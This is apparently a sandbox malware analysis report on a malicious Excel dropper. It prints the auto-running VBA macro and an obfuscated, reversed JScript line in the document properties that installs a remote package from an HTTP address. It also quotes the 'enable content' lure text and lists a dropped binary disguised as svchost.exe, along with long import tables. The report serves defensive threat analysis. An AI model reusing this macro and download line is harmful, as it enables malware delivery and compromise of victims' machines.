Downloader Dropper
Threat Names
VB:Trojan.Valyria.5362 Trojan.Zmutzy.Hory.1
Dynamic Analysis Report
Created on 2021-10-01T14:48:00
Excel Document
Remarks (1/1)
(0x0200000E): The overall sleep time of all monitored processes was truncated from "12 minutes" to "30 seconds" to reveal dormant functionality.
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filters: |
There are no files for this filter
There are no files in this analysis
File Name | Category | Type | Verdict | Actions |
C:\Users\kEecfMwgj\Desktop\f2c90ffe3562335fab9532003e43d4911b8e42f34e3d693ba82703311dc133d2.xls | Sample File | Excel Document |
AV Matches (1)
Threat Name | Verdict |
VB:Trojan.Valyria.5362 |
Office Information
Subject | JScript |
Description | eval('})"28.831.612.59//:ptth"(tcudorPllatsnI;2=leveLIU{))"rellatsnI.rellatsnIswodniW"(tcejbOXevitcA wen(htiw'.split('').reverse().join('')) |
Creator | Ferop |
Last Modified By | Administrator |
Create Time | 2021-08-17 12:24:08+00:00 |
Modify Time | 2021-10-01 13:01:11+00:00 |
Codepage | ANSI_Latin1 |
Application | Microsoft Excel |
App Version | 16.0 |
Document Security | NONE |
Titles Of Parts | Sheet1 |
scale_crop | False |
shared_doc | False |
Controls (1)
CLSID | Control Name | Associated Vulnerability |
{00020820-0000-0000-C000-000000000046} | Excel97Sheet | - |
VBA Macros (1)
Macro #1: Module1
Attribute VB_Name = "Module1"
Function Auto_Open()
Dim a As New ScriptControl
a.Language = ActiveWorkbook.BuiltinDocumentProperties("Subject").Value
a.AddCode (ActiveWorkbook.BuiltinDocumentProperties("Comments").Value)
End Function
Extracted Image Texts (1)
Image 1: 0.PNG
This document is protected by the Microsoft
1. Open the document in Microsoft office. Previewing online is not available for protected documents.
2. If this document was downloaded from your email, please click Enable Editing from the yellow bar above.
3. Once you have enabled editing, please click Enable Content from the yellow bar above.
Attention! We never ask for any confidential information for decryption! Please be aware!
CFB Streams (15)
Name | ID | Size | Actions |
Root\Workbook | 1 | 252.86 KB |
Root\_VBA_PROJECT_CUR\VBA\dir | 4 | 709 Bytes |
Root\_VBA_PROJECT_CUR\VBA\Sheet1 | 5 | 977 Bytes |
Root\_VBA_PROJECT_CUR\VBA\Module1 | 6 | 1.24 KB |
Root\_VBA_PROJECT_CUR\VBA\__SRP_0 | 7 | 1.27 KB |
Root\_VBA_PROJECT_CUR\VBA\__SRP_1 | 8 | 74 Bytes |
Root\_VBA_PROJECT_CUR\VBA\__SRP_2 | 9 | 84 Bytes |
Root\_VBA_PROJECT_CUR\VBA\__SRP_3 | 10 | 103 Bytes |
Root\_VBA_PROJECT_CUR\VBA\ThisWorkbook | 11 | 985 Bytes |
Root\_VBA_PROJECT_CUR\PROJECT | 13 | 479 Bytes |
Root\_VBA_PROJECT_CUR\PROJECTwm | 14 | 86 Bytes |
Root\SummaryInformation | 15 | 400 Bytes |
Root\DocumentSummaryInformation | 16 | 244 Bytes |
Root\CompObj | 17 | 108 Bytes |
AV Matches (1)
Threat Name | Verdict |
Trojan.Zmutzy.Hory.1 |
C:\ProgramData\Excel\svchost.exe | Dropped File | Binary |
Lowered to Suspicious because the artifact is known to be Clean or Trusted.
PE Information
Image Base | 0x400000 |
Entry Point | 0x424759 |
Size Of Code | 0x37000 |
Size Of Initialized Data | 0x10000 |
File Type | FileType.executable |
Subsystem | Subsystem.windows_gui |
Machine Type | MachineType.i386 |
Compile Timestamp | 2007-10-02 06:00:55+00:00 |
Version Information (10)
Comments | KiXtart 2010 CareWare |
CompanyName | Ruud van Velsen (Microsoft) |
FileDescription | KiXtart main executable |
FileVersion | 4, 60, 0, 0 |
InternalName | KIX32 |
LegalCopyright | Copyright Ruud van Velsen 2007 |
OriginalFilename | KIX32.EXE |
ProductName | KiXtart 2010 |
ProductVersion | 4.60 |
SpecialBuild | Build 250 |
Sections (4)
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
.text | 0x401000 | 0x36546 | 0x37000 | 0x1000 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.62 |
.rdata | 0x438000 | 0xb8ce | 0xc000 | 0x38000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 6.01 |
.data | 0x444000 | 0x1ef3c | 0x3000 | 0x44000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.32 |
.rsrc | 0x463000 | 0x80c | 0x1000 | 0x47000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.04 |
Imports (10)
NETAPI32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
Netbios | - | 0x43831c | 0x424ec | 0x424ec | 0x108 |
MPR.dll (6)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
WNetGetUserA | - | 0x438300 | 0x424d0 | 0x424d0 | 0x3d |
WNetUseConnectionA | - | 0x438304 | 0x424d4 | 0x424d4 | 0x4c |
WNetOpenEnumA | - | 0x438308 | 0x424d8 | 0x424d8 | 0x40 |
WNetEnumResourceA | - | 0x43830c | 0x424dc | 0x424dc | 0x1c |
WNetCancelConnection2A | - | 0x438310 | 0x424e0 | 0x424e0 | 0xc |
WNetCloseEnum | - | 0x438314 | 0x424e4 | 0x424e4 | 0x11 |
WINMM.dll (2)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
sndPlaySoundA | - | 0x438414 | 0x425e4 | 0x425e4 | 0x9c |
PlaySoundA | - | 0x438418 | 0x425e8 | 0x425e8 | 0xa |
VERSION.dll (3)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
GetFileVersionInfoSizeA | - | 0x438404 | 0x425d4 | 0x425d4 | 0x1 |
GetFileVersionInfoA | - | 0x438408 | 0x425d8 | 0x425d8 | 0x0 |
VerQueryValueA | - | 0x43840c | 0x425dc | 0x425dc | 0xa |
KERNEL32.dll (146)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
GetTickCount | - | 0x4380b4 | 0x42284 | 0x42284 | 0x1df |
GetCurrentProcessId | - | 0x4380b8 | 0x42288 | 0x42288 | 0x143 |
GetConsoleTitleA | - | 0x4380bc | 0x4228c | 0x4228c | 0x139 |
SetConsoleMode | - | 0x4380c0 | 0x42290 | 0x42290 | 0x2fd |
GetConsoleMode | - | 0x4380c4 | 0x42294 | 0x42294 | 0x133 |
GetStdHandle | - | 0x4380c8 | 0x42298 | 0x42298 | 0x1b9 |
GetConsoleScreenBufferInfo | - | 0x4380cc | 0x4229c | 0x4229c | 0x137 |
SetConsoleTextAttribute | - | 0x4380d0 | 0x422a0 | 0x422a0 | 0x305 |
SetConsoleCursorInfo | - | 0x4380d4 | 0x422a4 | 0x422a4 | 0x2f0 |
GetConsoleCursorInfo | - | 0x4380d8 | 0x422a8 | 0x422a8 | 0x128 |
AllocConsole | - | 0x4380dc | 0x422ac | 0x422ac | 0xa |
SetConsoleCursorPosition | - | 0x4380e0 | 0x422b0 | 0x422b0 | 0x2f2 |
WriteFile | - | 0x4380e4 | 0x422b4 | 0x422b4 | 0x3a4 |
FlushConsoleInputBuffer | - | 0x4380e8 | 0x422b8 | 0x422b8 | 0xed |
FillConsoleOutputAttribute | - | 0x4380ec | 0x422bc | 0x422bc | 0xc6 |
FillConsoleOutputCharacterA | - | 0x4380f0 | 0x422c0 | 0x422c0 | 0xc7 |
WriteConsoleW | - | 0x4380f4 | 0x422c4 | 0x422c4 | 0x3a3 |
WriteConsoleA | - | 0x4380f8 | 0x422c8 | 0x422c8 | 0x399 |
ReadConsoleA | - | 0x4380fc | 0x422cc | 0x422cc | 0x2a9 |
LocalFree | - | 0x438100 | 0x422d0 | 0x422d0 | 0x25c |
FormatMessageA | - | 0x438104 | 0x422d4 | 0x422d4 | 0xf3 |
WriteProfileStringA | - | 0x438108 | 0x422d8 | 0x422d8 | 0x3b0 |
GetProfileStringA | - | 0x43810c | 0x422dc | 0x422dc | 0x1b2 |
GetPrivateProfileStringA | - | 0x438110 | 0x422e0 | 0x422e0 | 0x19c |
GetCurrentThreadId | - | 0x438114 | 0x422e4 | 0x422e4 | 0x146 |
SetLastError | - | 0x438118 | 0x422e8 | 0x422e8 | 0x328 |
SetSystemPowerState | - | 0x43811c | 0x422ec | 0x422ec | 0x339 |
GetCurrentProcess | - | 0x438120 | 0x422f0 | 0x422f0 | 0x142 |
SetFilePointer | - | 0x438124 | 0x422f4 | 0x422f4 | 0x31b |
CreateFileA | - | 0x438128 | 0x422f8 | 0x422f8 | 0x53 |
GetFileSize | - | 0x43812c | 0x422fc | 0x422fc | 0x163 |
GlobalMemoryStatus | - | 0x438130 | 0x42300 | 0x42300 | 0x204 |
GetDiskFreeSpaceA | - | 0x438134 | 0x42304 | 0x42304 | 0x14d |
CompareFileTime | - | 0x438138 | 0x42308 | 0x42308 | 0x39 |
SystemTimeToTzSpecificLocalTime | - | 0x43813c | 0x4230c | 0x4230c | 0x35c |
FileTimeToSystemTime | - | 0x438140 | 0x42310 | 0x42310 | 0xc5 |
FileTimeToLocalFileTime | - | 0x438144 | 0x42314 | 0x42314 | 0xc4 |
GetModuleHandleA | - | 0x438148 | 0x42318 | 0x42318 | 0x17f |
GlobalFree | - | 0x43814c | 0x4231c | 0x4231c | 0x1ff |
GetCommandLineW | - | 0x438150 | 0x42320 | 0x42320 | 0x111 |
GetCommandLineA | - | 0x438154 | 0x42324 | 0x42324 | 0x110 |
SystemTimeToFileTime | - | 0x438158 | 0x42328 | 0x42328 | 0x35b |
GetSystemTime | - | 0x43815c | 0x4232c | 0x4232c | 0x1c8 |
GetFullPathNameA | - | 0x438160 | 0x42330 | 0x42330 | 0x169 |
GetEnvironmentVariableW | - | 0x438164 | 0x42334 | 0x42334 | 0x159 |
lstrcatW | - | 0x438168 | 0x42338 | 0x42338 | 0x3be |
lstrcpyW | - | 0x43816c | 0x4233c | 0x4233c | 0x3c7 |
SetSystemTime | - | 0x438170 | 0x42340 | 0x42340 | 0x33a |
GetComputerNameA | - | 0x438174 | 0x42344 | 0x42344 | 0x114 |
GetSystemDirectoryA | - | 0x438178 | 0x42348 | 0x42348 | 0x1c1 |
GetShortPathNameA | - | 0x43817c | 0x4234c | 0x4234c | 0x1b5 |
SetConsoleTitleA | - | 0x438180 | 0x42350 | 0x42350 | 0x306 |
GetEnvironmentVariableA | - | 0x438184 | 0x42354 | 0x42354 | 0x158 |
GetUserDefaultLCID | - | 0x438188 | 0x42358 | 0x42358 | 0x1e3 |
GetLocaleInfoA | - | 0x43818c | 0x4235c | 0x4235c | 0x174 |
GetSystemDefaultLCID | - | 0x438190 | 0x42360 | 0x42360 | 0x1be |
GetCurrentDirectoryA | - | 0x438194 | 0x42364 | 0x42364 | 0x140 |
GetLocalTime | - | 0x438198 | 0x42368 | 0x42368 | 0x173 |
GetWindowsDirectoryA | - | 0x43819c | 0x4236c | 0x4236c | 0x1f3 |
GetTempPathA | - | 0x4381a0 | 0x42370 | 0x42370 | 0x1d5 |
GetVersionExA | - | 0x4381a4 | 0x42374 | 0x42374 | 0x1e9 |
RaiseException | - | 0x4381a8 | 0x42378 | 0x42378 | 0x2a7 |
WideCharToMultiByte | - | 0x4381ac | 0x4237c | 0x4237c | 0x394 |
QueryPerformanceCounter | - | 0x4381b0 | 0x42380 | 0x42380 | 0x2a3 |
GetEnvironmentStringsW | - | 0x4381b4 | 0x42384 | 0x42384 | 0x157 |
FreeEnvironmentStringsW | - | 0x4381b8 | 0x42388 | 0x42388 | 0xf7 |
GetEnvironmentStrings | - | 0x4381bc | 0x4238c | 0x4238c | 0x155 |
FreeEnvironmentStringsA | - | 0x4381c0 | 0x42390 | 0x42390 | 0xf6 |
HeapSize | - | 0x4381c4 | 0x42394 | 0x42394 | 0x21c |
GetStringTypeW | - | 0x4381c8 | 0x42398 | 0x42398 | 0x1bd |
GetStringTypeA | - | 0x4381cc | 0x4239c | 0x4239c | 0x1ba |
IsValidLocale | - | 0x4381d0 | 0x423a0 | 0x423a0 | 0x241 |
EnumSystemLocalesA | - | 0x4381d4 | 0x423a4 | 0x423a4 | 0xaf |
GetConsoleOutputCP | - | 0x4381d8 | 0x423a8 | 0x423a8 | 0x135 |
SetHandleCount | - | 0x4381dc | 0x423ac | 0x423ac | 0x324 |
VirtualAlloc | - | 0x4381e0 | 0x423b0 | 0x423b0 | 0x381 |
VirtualFree | - | 0x4381e4 | 0x423b4 | 0x423b4 | 0x383 |
HeapCreate | - | 0x4381e8 | 0x423b8 | 0x423b8 | 0x212 |
HeapDestroy | - | 0x4381ec | 0x423bc | 0x423bc | 0x214 |
RtlUnwind | - | 0x4381f0 | 0x423c0 | 0x423c0 | 0x2d7 |
LCMapStringW | - | 0x4381f4 | 0x423c4 | 0x423c4 | 0x245 |
LCMapStringA | - | 0x4381f8 | 0x423c8 | 0x423c8 | 0x244 |
InitializeCriticalSection | - | 0x4381fc | 0x423cc | 0x423cc | 0x223 |
LoadLibraryA | - | 0x438200 | 0x423d0 | 0x423d0 | 0x252 |
DeleteCriticalSection | - | 0x438204 | 0x423d4 | 0x423d4 | 0x81 |
TlsFree | - | 0x438208 | 0x423d8 | 0x423d8 | 0x364 |
TlsSetValue | - | 0x43820c | 0x423dc | 0x423dc | 0x366 |
TlsAlloc | - | 0x438210 | 0x423e0 | 0x423e0 | 0x363 |
TlsGetValue | - | 0x438214 | 0x423e4 | 0x423e4 | 0x365 |
IsValidCodePage | - | 0x438218 | 0x423e8 | 0x423e8 | 0x23f |
InterlockedIncrement | - | 0x43821c | 0x423ec | 0x423ec | 0x22c |
GetOEMCP | - | 0x438220 | 0x423f0 | 0x423f0 | 0x193 |
GetACP | - | 0x438224 | 0x423f4 | 0x423f4 | 0xfd |
GetCPInfo | - | 0x438228 | 0x423f8 | 0x423f8 | 0x104 |
IsDebuggerPresent | - | 0x43822c | 0x423fc | 0x423fc | 0x239 |
SetUnhandledExceptionFilter | - | 0x438230 | 0x42400 | 0x42400 | 0x34a |
UnhandledExceptionFilter | - | 0x438234 | 0x42404 | 0x42404 | 0x36e |
TerminateProcess | - | 0x438238 | 0x42408 | 0x42408 | 0x35e |
SetConsoleCtrlHandler | - | 0x43823c | 0x4240c | 0x4240c | 0x2ee |
Beep | - | 0x438240 | 0x42410 | 0x42410 | 0x1f |
MultiByteToWideChar | - | 0x438244 | 0x42414 | 0x42414 | 0x275 |
Sleep | - | 0x438248 | 0x42418 | 0x42418 | 0x356 |
WaitForSingleObject | - | 0x43824c | 0x4241c | 0x4241c | 0x390 |
GetExitCodeProcess | - | 0x438250 | 0x42420 | 0x42420 | 0x15a |
SetEnvironmentVariableA | - | 0x438254 | 0x42424 | 0x42424 | 0x313 |
CreateProcessA | - | 0x438258 | 0x42428 | 0x42428 | 0x66 |
ReadFile | - | 0x43825c | 0x4242c | 0x4242c | 0x2b5 |
CloseHandle | - | 0x438260 | 0x42430 | 0x42430 | 0x34 |
FindFirstFileA | - | 0x438264 | 0x42434 | 0x42434 | 0xd2 |
GetFileAttributesA | - | 0x438268 | 0x42438 | 0x42438 | 0x15e |
CreateDirectoryA | - | 0x43826c | 0x4243c | 0x4243c | 0x4b |
RemoveDirectoryA | - | 0x438270 | 0x42440 | 0x42440 | 0x2c4 |
FindNextFileA | - | 0x438274 | 0x42444 | 0x42444 | 0xdc |
FindClose | - | 0x438278 | 0x42448 | 0x42448 | 0xce |
MoveFileA | - | 0x43827c | 0x4244c | 0x4244c | 0x26e |
CopyFileA | - | 0x438280 | 0x42450 | 0x42450 | 0x43 |
WritePrivateProfileStringA | - | 0x438284 | 0x42454 | 0x42454 | 0x3a9 |
LoadLibraryExA | - | 0x438288 | 0x42458 | 0x42458 | 0x253 |
GetProcAddress | - | 0x43828c | 0x4245c | 0x4245c | 0x1a0 |
FreeLibrary | - | 0x438290 | 0x42460 | 0x42460 | 0xf8 |
SetCurrentDirectoryA | - | 0x438294 | 0x42464 | 0x42464 | 0x30a |
GetModuleFileNameA | - | 0x438298 | 0x42468 | 0x42468 | 0x17d |
DeleteFileA | - | 0x43829c | 0x4246c | 0x4246c | 0x83 |
GetLastError | - | 0x4382a0 | 0x42470 | 0x42470 | 0x171 |
SetFileAttributesA | - | 0x4382a4 | 0x42474 | 0x42474 | 0x319 |
GetSystemInfo | - | 0x4382a8 | 0x42478 | 0x42478 | 0x1c5 |
GetSystemTimeAsFileTime | - | 0x4382ac | 0x4247c | 0x4247c | 0x1ca |
GetConsoleCP | - | 0x4382b0 | 0x42480 | 0x42480 | 0x122 |
GetLocaleInfoW | - | 0x4382b4 | 0x42484 | 0x42484 | 0x175 |
FlushFileBuffers | - | 0x4382b8 | 0x42488 | 0x42488 | 0xee |
SetEndOfFile | - | 0x4382bc | 0x4248c | 0x4248c | 0x310 |
GetFileType | - | 0x4382c0 | 0x42490 | 0x42490 | 0x166 |
SetStdHandle | - | 0x4382c4 | 0x42494 | 0x42494 | 0x337 |
LeaveCriticalSection | - | 0x4382c8 | 0x42498 | 0x42498 | 0x251 |
EnterCriticalSection | - | 0x4382cc | 0x4249c | 0x4249c | 0x98 |
GetNumberOfConsoleInputEvents | - | 0x4382d0 | 0x424a0 | 0x424a0 | 0x191 |
PeekConsoleInputA | - | 0x4382d4 | 0x424a4 | 0x424a4 | 0x28f |
ReadConsoleInputA | - | 0x4382d8 | 0x424a8 | 0x424a8 | 0x2aa |
HeapFree | - | 0x4382dc | 0x424ac | 0x424ac | 0x216 |
SetLocalTime | - | 0x4382e0 | 0x424b0 | 0x424b0 | 0x32b |
GetStartupInfoA | - | 0x4382e4 | 0x424b4 | 0x424b4 | 0x1b7 |
GetProcessHeap | - | 0x4382e8 | 0x424b8 | 0x424b8 | 0x1a3 |
HeapReAlloc | - | 0x4382ec | 0x424bc | 0x424bc | 0x21a |
HeapAlloc | - | 0x4382f0 | 0x424c0 | 0x424c0 | 0x210 |
InterlockedDecrement | - | 0x4382f4 | 0x424c4 | 0x424c4 | 0x228 |
ExitProcess | - | 0x4382f8 | 0x424c8 | 0x424c8 | 0xb9 |
USER32.dll (36)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
MessageBoxA | - | 0x438370 | 0x42540 | 0x42540 | 0x1df |
SendMessageTimeoutA | - | 0x438374 | 0x42544 | 0x42544 | 0x23e |
ExitWindowsEx | - | 0x438378 | 0x42548 | 0x42548 | 0xe1 |
RemoveMenu | - | 0x43837c | 0x4254c | 0x4254c | 0x22b |
EnableMenuItem | - | 0x438380 | 0x42550 | 0x42550 | 0xc2 |
ShowWindow | - | 0x438384 | 0x42554 | 0x42554 | 0x292 |
FindWindowA | - | 0x438388 | 0x42558 | 0x42558 | 0xe3 |
SetWindowPos | - | 0x43838c | 0x4255c | 0x4255c | 0x283 |
GetWindowRect | - | 0x438390 | 0x42560 | 0x42560 | 0x174 |
SetForegroundWindow | - | 0x438394 | 0x42564 | 0x42564 | 0x257 |
GetSystemMenu | - | 0x438398 | 0x42568 | 0x42568 | 0x15c |
VkKeyScanA | - | 0x43839c | 0x4256c | 0x4256c | 0x2c6 |
keybd_event | - | 0x4383a0 | 0x42570 | 0x42570 | 0x2d5 |
MapVirtualKeyA | - | 0x4383a4 | 0x42574 | 0x42574 | 0x1d6 |
DdeDisconnect | - | 0x4383a8 | 0x42578 | 0x42578 | 0x70 |
DdeInitializeA | - | 0x4383ac | 0x4257c | 0x4257c | 0x79 |
DdeCreateStringHandleA | - | 0x4383b0 | 0x42580 | 0x42580 | 0x6e |
DdeConnect | - | 0x4383b4 | 0x42584 | 0x42584 | 0x6b |
DdeFreeStringHandle | - | 0x4383b8 | 0x42588 | 0x42588 | 0x74 |
DdeUninitialize | - | 0x4383bc | 0x4258c | 0x4258c | 0x86 |
GetSystemMetrics | - | 0x4383c0 | 0x42590 | 0x42590 | 0x15d |
OemToCharA | - | 0x4383c4 | 0x42594 | 0x42594 | 0x1f1 |
SetTimer | - | 0x4383c8 | 0x42598 | 0x42598 | 0x27a |
KillTimer | - | 0x4383cc | 0x4259c | 0x4259c | 0x1b5 |
GetActiveWindow | - | 0x4383d0 | 0x425a0 | 0x425a0 | 0xeb |
EndDialog | - | 0x4383d4 | 0x425a4 | 0x425a4 | 0xc6 |
EnumWindows | - | 0x4383d8 | 0x425a8 | 0x425a8 | 0xde |
EnumChildWindows | - | 0x4383dc | 0x425ac | 0x425ac | 0xcb |
GetWindowTextA | - | 0x4383e0 | 0x425b0 | 0x425b0 | 0x177 |
GetWindowThreadProcessId | - | 0x4383e4 | 0x425b4 | 0x425b4 | 0x17b |
AttachThreadInput | - | 0x4383e8 | 0x425b8 | 0x425b8 | 0xb |
SetFocus | - | 0x4383ec | 0x425bc | 0x425bc | 0x256 |
SystemParametersInfoA | - | 0x4383f0 | 0x425c0 | 0x425c0 | 0x299 |
SendMessageA | - | 0x4383f4 | 0x425c4 | 0x425c4 | 0x23b |
CharToOemA | - | 0x4383f8 | 0x425c8 | 0x425c8 | 0x30 |
DdeClientTransaction | - | 0x4383fc | 0x425cc | 0x425cc | 0x69 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
AddPrinterConnectionA | - | 0x438420 | 0x425f0 | 0x425f0 | 0x11 |
DeletePrinterConnectionA | - | 0x438424 | 0x425f4 | 0x425f4 | 0x31 |
ADVAPI32.dll (44)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
RegUnLoadKeyA | - | 0x438000 | 0x421d0 | 0x421d0 | 0x207 |
RegSaveKeyA | - | 0x438004 | 0x421d4 | 0x421d4 | 0x1fe |
RegRestoreKeyA | - | 0x438008 | 0x421d8 | 0x421d8 | 0x1fc |
RegConnectRegistryA | - | 0x43800c | 0x421dc | 0x421dc | 0x1cc |
RegQueryInfoKeyA | - | 0x438010 | 0x421e0 | 0x421e0 | 0x1f1 |
RegEnumKeyExA | - | 0x438014 | 0x421e4 | 0x421e4 | 0x1de |
RegDeleteKeyA | - | 0x438018 | 0x421e8 | 0x421e8 | 0x1d4 |
RegEnumKeyA | - | 0x43801c | 0x421ec | 0x421ec | 0x1dd |
LookupAccountSidW | - | 0x438020 | 0x421f0 | 0x421f0 | 0x14a |
GetSidIdentifierAuthority | - | 0x438024 | 0x421f4 | 0x421f4 | 0x116 |
GetSidSubAuthorityCount | - | 0x438028 | 0x421f8 | 0x421f8 | 0x119 |
GetSidSubAuthority | - | 0x43802c | 0x421fc | 0x421fc | 0x118 |
GetTokenInformation | - | 0x438030 | 0x42200 | 0x42200 | 0x11a |
RegDeleteValueA | - | 0x438034 | 0x42204 | 0x42204 | 0x1d8 |
RegEnumValueA | - | 0x438038 | 0x42208 | 0x42208 | 0x1e1 |
RegSetValueExA | - | 0x43803c | 0x4220c | 0x4220c | 0x204 |
RegOpenKeyExA | - | 0x438040 | 0x42210 | 0x42210 | 0x1ec |
RegCloseKey | - | 0x438044 | 0x42214 | 0x42214 | 0x1cb |
RegCreateKeyExA | - | 0x438048 | 0x42218 | 0x42218 | 0x1d1 |
RegQueryValueExA | - | 0x43804c | 0x4221c | 0x4221c | 0x1f7 |
AllocateAndInitializeSid | - | 0x438050 | 0x42220 | 0x42220 | 0x1d |
LookupAccountSidA | - | 0x438054 | 0x42224 | 0x42224 | 0x149 |
FreeSid | - | 0x438058 | 0x42228 | 0x42228 | 0xe2 |
ClearEventLogA | - | 0x43805c | 0x4222c | 0x4222c | 0x39 |
OpenEventLogA | - | 0x438060 | 0x42230 | 0x42230 | 0x1aa |
BackupEventLogA | - | 0x438064 | 0x42234 | 0x42234 | 0x21 |
RegisterEventSourceA | - | 0x438068 | 0x42238 | 0x42238 | 0x209 |
ReportEventA | - | 0x43806c | 0x4223c | 0x4223c | 0x214 |
DeregisterEventSource | - | 0x438070 | 0x42240 | 0x42240 | 0xb0 |
InitiateSystemShutdownA | - | 0x438074 | 0x42244 | 0x42244 | 0x136 |
AdjustTokenPrivileges | - | 0x438078 | 0x42248 | 0x42248 | 0x1c |
OpenProcessToken | - | 0x43807c | 0x4224c | 0x4224c | 0x1ac |
LookupPrivilegeValueA | - | 0x438080 | 0x42250 | 0x42250 | 0x14f |
CryptDecrypt | - | 0x438084 | 0x42254 | 0x42254 | 0x89 |
CryptDeriveKey | - | 0x438088 | 0x42258 | 0x42258 | 0x8a |
CryptEncrypt | - | 0x43808c | 0x4225c | 0x4225c | 0x8f |
CryptDestroyKey | - | 0x438090 | 0x42260 | 0x42260 | 0x8c |
CryptCreateHash | - | 0x438094 | 0x42264 | 0x42264 | 0x88 |
CryptHashData | - | 0x438098 | 0x42268 | 0x42268 | 0x9d |
CryptGetHashParam | - | 0x43809c | 0x4226c | 0x4226c | 0x99 |
CryptDestroyHash | - | 0x4380a0 | 0x42270 | 0x42270 | 0x8b |
CryptReleaseContext | - | 0x4380a4 | 0x42274 | 0x42274 | 0xa0 |
CryptAcquireContextA | - | 0x4380a8 | 0x42278 | 0x42278 | 0x85 |
RegLoadKeyA | - | 0x4380ac | 0x4227c | 0x4227c | 0x1e7 |
ole32.dll (7)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
MkParseDisplayName | - | 0x43842c | 0x425fc | 0x425fc | 0xcd |
BindMoniker | - | 0x438430 | 0x42600 | 0x42600 | 0x0 |
CLSIDFromProgID | - | 0x438434 | 0x42604 | 0x42604 | 0x6 |
CoCreateInstance | - | 0x438438 | 0x42608 | 0x42608 | 0x10 |
OleBuildVersion | - | 0x43843c | 0x4260c | 0x4260c | 0xd0 |
OleInitialize | - | 0x438440 | 0x42610 | 0x42610 | 0xee |
CreateBindCtx | - | 0x438444 | 0x42614 | 0x42614 | 0x76 |
OLEAUT32.dll (18)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
SafeArrayCreate | 0xf | 0x438324 | 0x424f4 | 0x424f4 | - |
SysFreeString | 0x6 | 0x438328 | 0x424f8 | 0x424f8 | - |
SafeArrayPutElement | 0x1a | 0x43832c | 0x424fc | 0x424fc | - |
SafeArrayGetElement | 0x19 | 0x438330 | 0x42500 | 0x42500 | - |
SafeArrayGetUBound | 0x13 | 0x438334 | 0x42504 | 0x42504 | - |
SysAllocString | 0x2 | 0x438338 | 0x42508 | 0x42508 | - |
LHashValOfNameSys | 0xa5 | 0x43833c | 0x4250c | 0x4250c | - |
SysAllocStringLen | 0x4 | 0x438340 | 0x42510 | 0x42510 | - |
SafeArrayGetDim | 0x11 | 0x438344 | 0x42514 | 0x42514 | - |
SafeArrayPtrOfIndex | 0x94 | 0x438348 | 0x42518 | 0x42518 | - |
VariantChangeType | 0xc | 0x43834c | 0x4251c | 0x4251c | - |
SafeArrayRedim | 0x28 | 0x438350 | 0x42520 | 0x42520 | - |
SysAllocStringByteLen | 0x96 | 0x438354 | 0x42524 | 0x42524 | - |
VariantCopy | 0xa | 0x438358 | 0x42528 | 0x42528 | - |
SafeArrayAccessData | 0x17 | 0x43835c | 0x4252c | 0x4252c | - |
SafeArrayUnaccessData | 0x18 | 0x438360 | 0x42530 | 0x42530 | - |
VariantInit | 0x8 | 0x438364 | 0x42534 | 0x42534 | - |
VariantClear | 0x9 | 0x438368 | 0x42538 | 0x42538 | - |
Memory Dumps (2)
Name | Process ID | Start VA | End VA | Dump Reason | PE Rebuild | Bitness | Entry Point | AV | YARA | Actions |
svchost.exe | 4 | 0x00400000 | 0x00463FFF | Relevant Image | 32-bit | 0x004268CC |
svchost.exe | 4 | 0x00400000 | 0x00463FFF | Process Termination | 32-bit | - |
C:\Config.Msi\MSI76EE.tmp | Dropped File | Unknown |
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\desktop.ini | Dropped File | Unknown |
Known to be clean.
c:\users\keecfmwgj\appdata\local\temp\~df7f5127fbd2e163a7.tmp | Dropped File | Stream |
c:\users\keecfmwgj\appdata\local\temp\~df7732985c63e77b30.tmp | Dropped File | Stream |
Known to be clean.
c:\users\keecfmwgj\appdata\local\temp\history\history.ie5\desktop.ini | Dropped File | Unknown |
Known to be clean.
c:\users\keecfmwgj\appdata\local\temp\history\history.ie5\index.dat | Dropped File | Stream |
Known to be clean.
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\index.dat | Dropped File | Stream |
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\index.dat | Dropped File | Stream |
C:\Windows\Installer\18fe687.ipi | Dropped File | OLE Compound |
CFB Streams (17)
Name | ID | Size | Actions |
Root\䕙䇲䆸㲷䠧 | 1 | 76 Bytes |
Root\䕙䇲䆸㷷䐤䠨 | 2 | 12 Bytes |
Root\䒕䒪㾱䈶䠵 | 3 | 18 Bytes |
Root\䈜䈯䗦䒬䖱 | 4 | 36 Bytes |
Root\䒏䇯䕨䠶 | 5 | 128 Bytes |
Root\䕙䓲䕨䌷䖨 | 6 | 664 Bytes |
Root\䌝䈰䗜䐤㵳䚲 | 7 | 20 Bytes |
Root\䌝䈰䗜䐤㱳䊬䠫 | 8 | 16 Bytes |
Root\䄍䄷䄥䈶䄙䋷 | 9 | 64 Bytes |
Root\䌍䎶䕙䐲䗳 | 10 | 0 Bytes | - |
Root\䌍䎶䈜䌵䏤 | 11 | 0 Bytes | - |
Root\䜜䗶䐨䈛䗶䕲㼨䔨䈸䆱䠨 | 12 | 2 Bytes |
Root\䉊䈷㻵䅨䒲䠷 | 13 | 0 Bytes | - |
Root\䕝䑤䄶䗦䒬㷱䐤䠨 | 14 | 40 Bytes |
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䒕䠺 | 15 | 20 Bytes |
